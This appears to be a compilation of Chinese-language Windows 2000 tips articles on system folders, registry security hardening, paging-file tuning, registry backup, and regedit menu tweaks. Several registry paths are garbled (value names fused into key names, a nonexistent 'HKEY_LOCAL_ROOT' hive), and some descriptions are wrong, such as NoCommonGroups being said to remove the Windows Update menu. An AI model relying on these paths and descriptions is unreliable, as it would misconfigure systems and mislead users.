Windows 2000系统文件夹一览

    Windows 2000安装完成后，会生成两个文件夹：WINNT和Documents and Settings，为叙述方便，文本字符串约定如下：
    ％SystemRoot％：Windows 2000所在的安装文件夹，如C:\WINNT。
    ％USERPROFILE％：当前用户配置文件位置，如C:\Documents and Settings\用户\。
    如果某个用户没有特定的配置文件，则该用户的配置文件在安装分区\Documents andSettings\All Users\下。
#1　　一、在％SystemRoot％文件夹下
    \Cursors
    \Fonts
    \Media
    \Help
    上面几个文件夹功能与WIN9X相同，分别用于放置Windows的光标、字体、媒体以及帮助文件。其中\Media文件夹增加了几首经典的音乐，如贝多芬的《命运交响曲》，《献给艾丽丝》，莫扎特的第40号交响乐等等，可不要错过哦！
    \system
    \system32
    与WIN9X不同的是，Windows 2000几乎所有的系统文件都放在\system32下，而\system下只有一些16位的驱动程序以及一些应用软件的共享运行库。
    \repair
    这是第一次安装Windows 2000时系统自动保存下来的有关系统文件，如AUTOEXEC.BAT，CONFIG.SYS，注册表等。
    \Tasks
    计划任务文件夹。
    \Temp
    记得在WIN9X下我们得经常光顾它，以删除一些过时的临时文件。在Windows 2000下，这个文件夹已经基本不起作用了，每个用户都将使用不同的临时文件夹（下面将提到）。
#1　　二、在％USERPROFILE％文件夹下
    \「开始」菜单
    用户的开始菜单。
    \桌面
    用户的桌面，这里只包括用户建立的文件和文件夹。系统预定义的文件夹如回收站等则不包含在内，使这些文件夹显示出来可以通过修改注册表来实现。
    \Favorites
     收藏夹。
    \Recent
    “开始”菜单里的“文档”，记录了最近打开的文件。
    \My Documents
    “我的文档”文件夹，在Windows 2000下，每个用户都有各自的“我的文档”文件夹。
    \Templates
    模板文件，用于“新建”菜单。
    \SendTo
    “发送到”菜单。
    \NetHood
    “网上邻居”。在WIN9X中，打开“网上邻居”后，我们首先看到的是本机所在的整个工作组。而Windows 2000中的“网上邻居”则把在同一工作组中的计算机放入了“邻近的计算机”文件夹中。打开“网上邻居”后，看到的只是三个图标：“添加网上邻居”，“整个网络”和“邻近的计算机”。
    \Cookies
    用户的Cookies。
    \Application Data\Microsoft\Internet Explorer\Quick Launch
    这就是“开始”菜单旁边的“快速启动”工具栏。
    \Application Data\Microsoft\Address Book
    通讯簿。
    \Local Settings\Temp
    用户的临时文件夹。
    \Local Settings\Temporary Internet Files
    IE浏览器的CACHE文件夹（Internet临时文件夹）。
    \Local Settings\History
    IE浏览器的历史记录，它包含了最近打开的Web站点。


Windows 2000系统下修改注册表加强安全

《一键清理系统垃圾》

Windows 2000系统下修改注册表加强安全

    1)设置生存时间

    HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Tcpip ParametersDefaultTTL REG_DWORD 0-0xff(0-255 十进制，默认值128)

    说明:指定传出IP数据包中设置的默认生存时间(TTL)值.TTL决定了IP数据包在到达目标前在网络中生存的最大时间.它实际上限定了IP数据包在丢弃前允许通过的路由器数量.有时利用此数值来探测远程主机操作系统。

    2)防止ICMP重定向报文的攻击

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
\ParametersEnableICMPRedirects REG_DWORD 0x0(默认值为0x1)

    说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)发送给它的ICMP重定向消息，有时会被利用来干坏事.Win2000中默认值为1，表示响应ICMP重定向报文。

    3)禁止响应ICMP路由通告报文

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
\Parameters\Interfaces\interface

    PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)

    说明:“ICMP路由公告”功能可造成他人计算机的网络连接异常，数据被窃听，计算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积，长时间的网络异常。因此建议关闭响应ICMP路由通告报文。Win2000中默认值为2，表示当DHCP发送路由器发现选项时启用。

    4)防止SYN洪水攻击

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
\Tcpip\ParametersSynAttackProtect REG_DWORD 0x2(默认值为0x0)

    说明:SYN攻击保护包括减少SYN-ACK重新传输次数，以减少分配资源所保留的时间.路由缓存项资源分配延迟，直到建立连接为止。如果synattackprotect=2，则AFD的连接指示一直延迟到三路握手完成为止。注意，仅在TcpMaxHalfOpen和TcpMaxHalfOpenRetried设置超出范围时，保护机制才会采取措施。

    5) 禁止C$、D$一类的缺省共享

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver
\parametersAutoShareServer、REG_DWORD、0x0

    6) 禁止ADMIN$缺省共享

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver
\parametersAutoShareWks、REG_DWORD、0x0

    7) 限制IPC$缺省共享

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Lsarestrictanonymous REG_DWORD 0x0 缺省

    0x1 匿名用户无法列举本机用户列表

    0x2 匿名用户无法连接本机IPC$共享

    说明:不建议使用2，否则可能会造成你的一些服务无法启动，如SQL Server

    8)不支持IGMP协议

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
\ParametersIGMPLevel REG_DWORD 0x0(默认值为0x2)

    说明:记得Win9x下有个bug，就是用可以用IGMP使别人蓝屏，修改注册表可以修正这个bug.Win2000虽然没这个bug了，但IGMP并不是必要的，因此照样可以去掉.改成0后用route print将看不到那个讨厌的224.0.0.0项了。

    9)设置arp缓存老化时间设置

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip
\ParametersArpCacheLife REG_DWORD 0-0xFFFFFFFF(秒数，默认值为120秒)

    ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF(秒数，默认值为600)

    说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife，则引用或未引用的ARP缓存项在ArpCacheLife秒后到期.如果ArpCacheLife小于ArpCacheMinReferencedLife，未引用项在ArpCacheLife秒后到期，而引用项在ArpCacheMinReferencedLife秒后到期.每次将出站数据包发送到项的IP地址时，就会引用ARP缓存中的项。

    10)禁止死网关监测技术

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip
\ParametersEnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)

    说明:如果你设置了多个网关，那么你的机器在处理多个连接有困难时，就会自动改用备份网关.有时候这并不是一项好主意，建议禁止死网关监测。

    11)不支持路由功能

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip
\ParametersIPEnableRouter REG_DWORD 0x0(默认值为0x0)

    说明:把值设置为0x1可以使Win2000具备路由功能，由此带来不必要的问题。

    12)做NAT时放大转换的对外端口最大值

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip
\ParametersMaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)

    说明:当应用程序从系统请求可用的用户端口数时，该参数控制所使用的最大端口数.正常情况下，短期端口的分配数量为1024-5000.将该参数设置到有效范围以外时，就会使用最接近的有效数值(5000或65534).使用NAT时建议把值放大点。

    13)修改MAC地址

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\

    找到右窗口的说明为"网卡"的目录，比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}

    展开之，在其下的0000，0001，0002...的分支中找到"DriverDesc"的键值为你网卡的说明，比如说"DriverDesc"的值为"Intel(R) 82559 Fast Ethernet LAN on Motherboard"然后在右窗口新建一字符串值，名字为"Networkaddress"，内容为你想要的MAC值，比如说是"004040404040"然后重起计算机，ipconfig /all看看。

作者：
来源：天极网


Windows 2000页面文件的优化

《一键清理系统垃圾》

Windows 2000页面文件的优化

    在主流计算机的内存配置已经提升到128MB，不过对于庞大的Windows操作系统以及功能越来越强大、占用系统内存资源也越来越多的各种软件来说，128MB还是远远不能满足要求的，这时候Windows使用的页面文件（功能相当于我们常说的虚拟内存）就可以发挥其作用了。它将一部分硬盘空间设置为虚拟内存，从而扩大了计算机的可用“内存”空间来满足程序的运行要求。尽管由于硬盘的读取、传输速率等远远低于内存的速率，容易导致系统工作效率的降低和系统反应的延迟，但相对于花巨资购买硬件提高系统性能来说，这种以时间和效率来换取性能的做法还是非常不错的。

    从Windows 3．X到 Windows 9X，虚拟内存技术的运用日渐成熟，在使用中通常是利用Windows安装目录中的Win386．swp这个交换文件来实现虚拟内存的创建。如今的Windows 2000采用页面文件的方式来实现虚拟内存的创建，此页面文件是安装逻辑盘根目录下的Pagefile．sys文件。它和Windows 9X下的交换文件的作用大致是一样的，都是当程序运行时主存空间不够用的时候用于创建虚拟内存的。通常，我们在使用时都是按照系统默认的设置让Windows操作系统管理虚拟内存，尽管这样做比较方便，但微软为了兼容广大计算机配置，自行设置的管理方式通常比较保守，因此它的工作效率常常不会令人满意。高级用户通常自己对Windows的虚拟内存管理进行优化处理（如自行定义交换文件的大小、位置等），来尽量获得比较高的工作效率。实践证明，正确地进行虚拟内存管理优化处理能够很好地提高系统的运行性能，Windows 9X是这样，Windows 2000更是这样。优化的关键就在于虚拟内存管理中的重要“部件”――页面文件（交换文件）。下面，我们就来详细地探讨一下Windows 2000页面文件的一些优化措施。

    Windows 2000中关于页面文件的管理项目在控制面板中，进入“控制面板”后选择“系统”图标，然后在“高级／性能选项”中选择“更改”，就可以进入如所示的“虚拟内存”的设置页面。页面中显示着当前系统所设置的页面文件的大小、所在位置、磁盘可用空间以及微软的推荐设置值等，我们就结合页面文件的这些属性来谈谈优化的具体设置。

一、页面文件的大小

    对于系统中页面文件设置的大小，微软的建议是页面文件的最小值（就是上图中的初始大小），应该是当前系统内存容量再加上12MB（RAM＋12MB），若计算机系统拥有256MB内存的，就要将页面文件的最小值设置为268MB，这样才能让操作系统在崩溃或死机前将内存中全部的内容复制到硬盘上。对于那些系统内存容量小于256MB的用户，则建议将页面文件的最小值设得更大些，应该大于内存容量加12MB的数值：①那些使用128MB或者更少内存的计算机用户应该将当前系统内存容量的1．75倍设置为页面文件的最小值；②那些内存容量在128MB和256MB之间的用户则可以将当前系统容量的1．5倍设置为页面文件的最小值。当然，将页面文件的最小值设置为大于这些理论值，对于整个系统的运行是没有什么影响的，而且应该会更好些，唯一的损失也许也就是硬盘可用空间的相应减少。笔者的建议是，一般用户通常不需要按照微软上面的建议值进行设置，因为毕竟Windows 2000系统崩溃的机会大大小于Windows 9X，而且就算系统崩溃的话，进行的一般工作也没有重要到一定进行全部保存的地步，因此在设置页面文件时，只要保证其大小不小于系统内存的3／4，就可以保证系统比较稳定快速地运行了。但如果使用者的硬盘空间的确非常紧张的话，那么页面文件的最小值也应该至少和你的内存容量1／2相当，小于这个数字的话，将有可能经常性地引起系统崩溃（死机）现象的发生。

    至于页面文件的最大值，则应该设置得越大越好，通常建议将它设置为最小值的2到3倍。使用者不必在意它的具体设置值。和Win9X系统的页面文件管理相比，Windows 2000要“智能”得多，它的页面文件是可以自己动态设置的。它仅在系统需要时才会自动扩充页面的大小，这样可以避免页面文件占用太多的硬盘空间并保证避免在复杂操作中因内存不足而出现错误。

二、页面文件的存放位置

    Windows 2000允许使用者通过将页面文件分布到各个不同的物理硬盘上（注意是硬盘而不是分区）的方法来提高系统的执行性能。从理论上讲这样做的确是可行的，但是要注意的是由于各硬盘间可能存在的寻道时间、传输速度等方面的差异而导致的系统性能的下降，因此应该尽量选择速度最快的硬盘，作为页面文件的存放地。另外要注意的是，尽管Windows 2000也支持在同一硬盘多分区上分别建立页面文件，但这样做非但不能提高系统的性能，反而将明显地降低整个系统的工作效率，这是由于当操作系统需要读写页面文件时，如果需要读取的内容不在同一个分区的页面文件中时，硬盘磁头将频繁地在各个分区间移动，这将大大降低系统的运行效率。从实际的使用效果来看，这样做还不如将页面文件只集中存放到一个分区中来的好，因此，笔者建议拥有多硬盘的用户应该考虑以下的一些方案：①多硬盘之间的速度差异不大，可以将页面文件分布到各硬盘上去；②多硬盘之间的速度差异比较大，则应该将页面文件尽量存放到另外的速度较快的一个（或多个）硬盘上去。对于单硬盘的用户，如果硬盘可用空间允许的话，则应该尽量将页面文件的位置设置在同一的分区中。

三、页面文件的连续性

    页面文件的连续性在Windows 2000的相关设置中并没有相应的显示，但笔者认为很有必要单独“拎”出来谈一谈。连续的页面文件的工作效率将比不连续的高很多，其中的原因和上面谈及的不要将页面文件设置在同一硬盘多个分区的道理是一样的，也在于硬盘磁头的移动问题，不连续的页面文件也将导致系统在使用虚拟内存时硬盘磁头频繁地在不连续的扇区间“跳”动，因此应该尽量保证页面文件的连续。大家可以运行Windows 2000自带的“磁盘碎片整理程序”并选择其中的“分析”功能来查看页面文件在硬盘上的相应位置现，其中显示的“绿色”区域（系统文件）就是页面文件所在位置。也许有些使用者对于页面文件会出现不连续的情况表示怀疑，那么可以试试下面的操作：如果使用者是双操作系统的话，可以先进入Windows 9X，将Windows 2000的页面文件Pagefile．sys剪切到其他分区或者硬盘中，然后再马上粘贴回去，重新启动系统到Windows 2000下，运行磁盘碎片整理程序”分析一下，绿色的区域将被分割为大大小小不同的好几个区域，页面文件这时就是零碎不连续的。

    尽管Windows 2000提供的“磁盘碎片整理程序”要比Windows 9X下的好用得多，但是对于不连续的页面文件它还是无法进行整理。要进行页面文件碎片整理的话，需要第三方的相应工具，如Perfect Disk 2000以及Norton SystemWorks 2001（诺顿）的 Speed Disk等。另外，如果使用者没有这些工具而且页面文件所在分区或者硬盘不是NTFS格式的话，可以参照测试页面文件不连续情况下的操作方法。首先从双操作系统进入Windows 9X，然后将页面文件剪切到其他分区或者硬盘中，然后用Windows 9X下的磁盘整理工具对相应的分区或者硬盘进行整理，等整理完毕后再将页面文件重新粘贴回去，就可以保证页面文件的连续性了。

返回


Windows 2000注册表的备份与恢复

《一键清理系统垃圾》

Windows 2000注册表的备份与恢复

    Windows 2000 将它的配置信息存储在名为注册表的数据库中，其中包含了每个计算机用户的配置文件，以及有关系统硬件、已安装的程序和属性设置等信息，Windows 2000 在运行过程中要一直引用这些信息。注册表是以二进制形式存储在硬盘上，错误地编辑注册表可能会严重损坏系统。所以，在更改注册表之前，强烈建议备份注册表信息。为了防止在修改注册表的时候发生致命错误，有必要了解一下注册表文件的备份和恢复方法。除此之外，为了研究注册表的结构，还可以将注册表中的某一主键或子键保存为文本文件，或者打印出来，这项工作同样需要了解注册表文件的导入与导出方法。
    一、完全备份／恢复注册表
    如果要完全备份注册表，可以在注册表编辑器Regedit.exe中单击“注册表”菜单下的“导出注册表文件”命令，并选择导出范围为“全部”，将注册表文件（＊.reg）保存在硬盘上即可。要完全还原注册表的方法同上，只需要单击“注册表”菜单下的“导入注册表文件”命令，然后选择硬盘上相应的备份注册表文件即可。顺便提一下，Regedit.exe（16位的注册表编辑器）包含在 Windows 2000 中的主要原因是其搜索功能比较强，用户同样可以使用 Regedit.exe 更改注册表，但其功能不够全面（如无法设置注册表项的权限），可能无法正确查看或编辑个别数据类型。因此，建议只将 Regedit.exe 用于搜索及注册表的完全备份，在需要编辑注册表时，使用system32目录下的 Regedt32.exe（它是32位注册表编辑器，提供了一些高级功能，采用多窗口格式显示各预定义项，查看起来比较方便）。
    二、部分备份注册表
    如果只需要保存一个根键或者一个主键（子键）等一般的备份，在Regedt32中就可以比较方便地完成。首先选择要保存的主键或子键，然后再单击“注册表”菜单下“保存项”命令，在弹出的“保存项”对话框中输入要保存的注册表文件的文件名，扩展名建议使用“reg”，便于今后查找。
    在保存某些主键或子键时，因为其使用的用户不同，或者是该主键或子键正在被系统使用，会出现禁止访问的警告：“权限不足，无法保存项”。这时系统管理员可以使用“安全”菜单下的“权限”命令，对这些主键或子键的用户赋予“完全控制”的权限（具体操作参见第15期《电脑报》软件世界中《Windows 2000 注册表直通车（上）》一文），然后就可以保存该项了。
    将注册表主键或子键保存为“项”文件，无法直接用文本编辑器打开查看，所以想研究注册表的结构的话，可以将注册表文件导出为文本文件，操作的方法是选择“注册表”菜单下“将子目录树另存为”命令，将其命名为扩展名为TXT的文件后，再单击“保存”按钮即可。以后我们就可以使用Windows的写字板或记事本来查看这个文本文件了。如果需要，也可以使用同一菜单下的“打印子目录树”命令来打印。
    三、部分恢复／导入注册表
    部分恢复／导入注册表有两种方法，第一种是还原“项”，即使用以前备份的注册表文件或其它注册表文件来覆盖现有的主键。首先在Regedt32注册表编辑器中，将光标移至要还原的主键上，再选择“注册表”菜单下的“还原”命令，并在“还原项”窗口中选择要还原的注册表文件，单击“打开”按钮，确认覆盖现有主键后，即可还原该项到当前选定的项上。注意：被选择还原的文件必须与注册表编辑器中所选择的主键内容吻合，即原先保存的注册表“项”只能还原到原先的位置。
    另外一种方法是加载配置单元（如^20020305a^）。“加载配置单元”和“卸载配置单元”。这两个命令只有在[HKEY_USERS]或[HKEY_LOCAL_MACHINE]这两个预定义项窗口中才有效，将配置单元加载到注册表中后，配置单元成为其中一个项的子项。具体做法是在Regedt32注册表编辑器中，先用鼠标选择上述两个预定义项中的一个主键，再选择“注册表”菜单下的“加载配置单元”命令，接着在“加载配置单元”对话框内选择要加载的注册表文件，单击“打开”按钮后出现“加载配置单元”对话框，在对话框的“项名称”文本框内输入新主键的名称，如“.ChenNai”，再单击“确定”按钮，这样你就发现在当前主键的下面出现了一个新的主键（.ChenNai）。如果要卸载该配置单元，也很简单，选中该主键后，选择“注册表”菜单下“卸载配置单元”命令即可。
    上述两种方法的不同之处在于“加载配置单元”引入的主键可以是注册表内原先没有的内容。
    最后说一下，Windows 2000中注册表文件的位置，同Windows 9X一样，Windows 2000的注册表也分为两个部分，但包括多个文件，其中用户配置文件保存在根目录“Documents and Settings”下用户名的目录中，包括两个隐藏文件：NTUSER.DAT、NTUSER.INI及ntuser.dat.LOG日志文件。系统配置文件位于Windows 2000系统目录下的“SYSTEM32\CONFIG”中，包括DEFAULT、SOFTWARE、SYSTEM、AppEvent.Evt、SecEvent.Evt、SysEvent.Evt等多个隐藏文件及其相应的.LOG（日志）文件和.SAV文件。这些注册表文件在Windows 2000运行时无法使用其它工具打开，这一点与Windows 9X下的system.dat及user.dat不同。


Windows 2000注册表直通车

《一键清理系统垃圾》

Windows 2000注册表直通车

    我在安装了Windows 2000简体中文正式版后，发现它类似NT，提供了相当多的系统、管理工具，了解掌握这些新工具的使用方法，将会更有利于我们熟练使用Windows 2000。于是我首先对其管理核心“注册表编辑器”进行了一番研究，发现了一些新特性和运用修改技巧，现介绍如下。
    你可以选择菜单“开始／运行”，在弹出的运行对话框中输入“regedit”，再单击“确定”按钮来启动类似于Windows 9X的注册表编辑器（^15020305a^1）。
    它比Windows 9X下的注册表编辑器增加了许多功能。首先，在右边窗口的键值详细列表中增加了类型列，使我们可以很直观地了解键值的类型，如：如REG_SZ为字符串值，REG_DWORD为DWORD值，REG_BINARY为二进制值等；其次，在菜单栏中增加了类似IE的收藏菜单，提供了收藏夹功能，它可以方便你快速定位到需要经常修改的主键位置；第三，它还提供了记忆功能，即每次当你打开它时，左边窗口中的树形主键分支会自动展开，把焦点定位到你最近一次修改过的位置。
    除了上述类似于Windows 9X的注册表编辑器外，Windows 2000还提供了一个新版的注册表编辑器（注意：下面我们介绍的注册表修改都是在其中进行），位置在D:\WINNT\system32\regedt32.exe（假设D为Windows 2000的安装盘符），运行它，主界面如^15020305b^2所示。
    该注册表编辑器拥有多个子窗口，每个子窗口代表本地计算机上的一个预定义项（即五大根键）。这个注册表编辑器不仅可以显示编辑本地计算机的注册表项，还可以访问远程计算机的注册表，当访问远程计算机的注册表时，只可使用两个预定义项[HKEY_USERS]和[HKEY_LOCAL_MACHINE]。
    下面简要说明一下这些预定义项的含义：
    [HKEY_CURRENT_USER]：包含当前登录用户的配置信息的根目录。用户文件夹、屏幕颜色和控制面板设置存储在此处。该信息被称为用户配置文件，是 HKEY_USERS 的子项。
    [HKEY_USERS]：包含计算机上所有用户的配置文件的根目录。
    [HKEY_LOCAL_MACHINE]：包含针对该计算机（全部用户）的配置信息。
    [HKEY_CLASSES_ROOT]：是 HKEY_LOCAL_MACHINE\Software 的子项。此处存储的信息可以确保在Windows 资源管理器中使用正确的程序打开不同类型的文件。
    [HKEY_CURRENT_CONFIG]：包含本地计算机在系统启动时所用的硬件配置文件信息。
    这个新版注册表编辑器除了具备原来Windows 9X注册表编辑器全部功能外，最重要的是增加了“安全”菜单，也就是说，管理员可以给注册表项指派“权限”，这一功能在NT中早就采用了，但在面向单机的操作系统中还是首次提供。这使得注册表的安全性大大提高。下面以允许用户访问“控制面板”注册表项但不保存对它的任何修改为例，介绍一下如何指派“权限”。
    首先在[HKEY_CURRENT_USER]窗口单击“Control Panel”主键，然后选择“安全”菜单中的“权限”，在“Control Panel的权限”对话框中选择用户，再选中“读取”右边的“允许”复选框，最后单击“确定”即可（^15020305c^3）。
    类似于Window 9X的注册表，我们同样可以通过修改一些注册表项实现一些Windows 2000中无法直接设置的功能，特别是在目前多数Windows 9X的修改工具都无法在Windows 2000中正常使用的情况下，因此只好“自己动手，丰衣足食”了（注意：如果你需要练习使用这个新版注册表编辑器，建议将“选项”菜单中的“只读模式”打开，以保护你的注册表数据免遭意外的损坏和突然的改变。单击“只读模式”后，注册表编辑器将不保存所作的任何更改）。
    1．加速菜单显示
    Windows 2000默认的菜单显示效果为“淡入淡出”，在这种效果下，修改菜单显示速度并不明显，所以请先将“淡入淡出效果”改为“滚动效果”。方法是在桌面上单击右键，选择“属性”，弹出“显示 属性”窗口，然后在“效果”标签下将“动画显示菜单和工具提示”右边的“淡入淡出效果”改为“滚动效果”。然后打开注册表编辑器，定位到[HKEY_CURRENT_USER\Control Panel\Desktop]，在右边窗口双击键值名“Menushowdelay”，将默认的值改为“0”或比“400”小的数值即可。该项取值范围是0～100000，单位是毫秒。
    2．更改登录背景
    打开注册表编辑器，定位到“HKEY_USERS\.DEFAULT\Control Panel\Desktop”，在右边窗口双击键值名“Wallpaper”，在文本输入框内将默认值“（无）”改为背景图片文件所在的路径位置即可。
    在Windows 2000中，你可以运行WINNT\system32目录下的regedit32.exe程序，打开新版注册表编辑器窗口。在其中，你还可以进行以下设置。
    3．自动刷新窗口内容
    选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update分支，在右边窗口中可以看到DWORD型键值 “UpdateMode”。若将它的值设为0，则表示自动刷新；若将它的值设为1，则表示手工刷新，相当于在资源管理器窗口内按“F5”键或者在“查看”菜单中选择“刷新”命令。
    双击该键值，你就可以在“DWORD值编辑器”内设定它的值为“1”或“0”，最后再单击“确定”按钮即可。
    4．去掉“Windows Update”菜单
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoCommonGroups”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮，再将 “NoCommonGroups” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    5．去掉“文档”菜单
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoRecentDocsMenu”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoRecentDocsMenu”键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    6．去掉“查找”菜单
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoFind”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoFind” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    7．去掉“运行”菜单
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoRun”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoRun” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    8．去掉“注销”菜单
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoLogOff”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoLogOff” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    9．去掉“关闭系统”菜单
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoClose”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoClose” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    10．去掉“设置”菜单
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoSetFolders”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoSetFolders” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    11．自动清除“文档”菜单内容
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“ClearRecentDocsOnExit”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “ClearRecentDocsOnExit” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    12．让“文档”菜单中只显示你常用到的文件
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoRecentDocsHistory”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoRecentDocsHistory” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    13．查看“自启动”程序
    绝大多数“自启动”程序都是通过注册表加载的，而它们在“开始／程序／启动”菜单中是看不到的。这时，你可以选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run分支查看，也可以删除右边窗口中的一些键值而达到禁止某些程序自启动的目的。
    14．为 “新建”菜单减肥
    鼠标右键的快捷菜单中，“新建”菜单的子菜单随着你安装应用程序的增加，会变得越来越长，如果你想为它减肥，可以选择“本地机器上的HKEY_LOCAL_MACHINE”及“本地机器上的HKEY_LOCAL_ROOT”子窗口，选择“查看／搜索项”菜单，然后在查找对话框中输入“shellnew”，并选中“全字匹配”复选框，然后开始查找。找到对应程序项后将下面的shellnew子键删除掉即可。
    15．删除多余的配色方案
    打开“控制面板”窗口中的“显示”，然后在“显示属性”窗口中选择“外观”选项卡，在“方案”下拉列表框中，你可以看到多种配色方案，你可以删除不需要的方案。方法是选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Control Panel\Appearance\Schemes分支，这时在窗口的右边会出现系统自带的各种配色方案。
    将你认为无用的配色方案删除掉，但注意保留“Windows默认”一项即可。
    16．为“回收站”改名
    选择“本地机器上的HKEY_CLASSES_ROOT”子窗口，定位到HKEY_CLASSES_ROOT\CLSID\{645FF040－5081－101B－9F08－00AA002F954E}分支。双击右边窗口的“回收站”，弹出字符串编辑器，然后在文本输入框内，将“回收站”改为你喜欢的名字如“垃圾筒”并重新启动机器即可。
    在Windows 2000中，你可以运行WINNT\system32目录下的regedit32.exe程序，打开新版注册表编辑器窗口。在其中，你还可以进行以下设置。
    17．删除桌面上的系统图标
    当你想删除桌面上的“回收站”、“Internet Explorer”等系统设定的图标时，会发现它们不能用一般的方法删除。这时你可以选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace分支，在该分支下面有多个子键，这些子键对应桌面上的“系统”图标，在右边窗口你可以看到，如“Internet Explorer”等。要删除不需要的图标，只须删除对应的键值，再重新启动系统即可。
    18．去掉“网上邻居”图标
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoNetHood”，在数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。再将 “NoNetHood” 键值设为“1”，最后单击“确定”按钮并重新启动系统即可。
    19．隐藏指定的驱动器
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer分支，再选择“编辑”菜单下的“添加数值”命令，弹出添加数值窗口。在数值名称中输入“NoDrives”的数据类型下拉列表框中选择“REG_DWORD”，单击“确定”按钮。在接下来弹出的DWORD值编辑器对话框的“基数”分组框中选择“十进制”单选钮，在“数据”编辑框中输入你要隐藏的驱动器号并确定，重新启动系统后相应的驱动器即被隐藏。
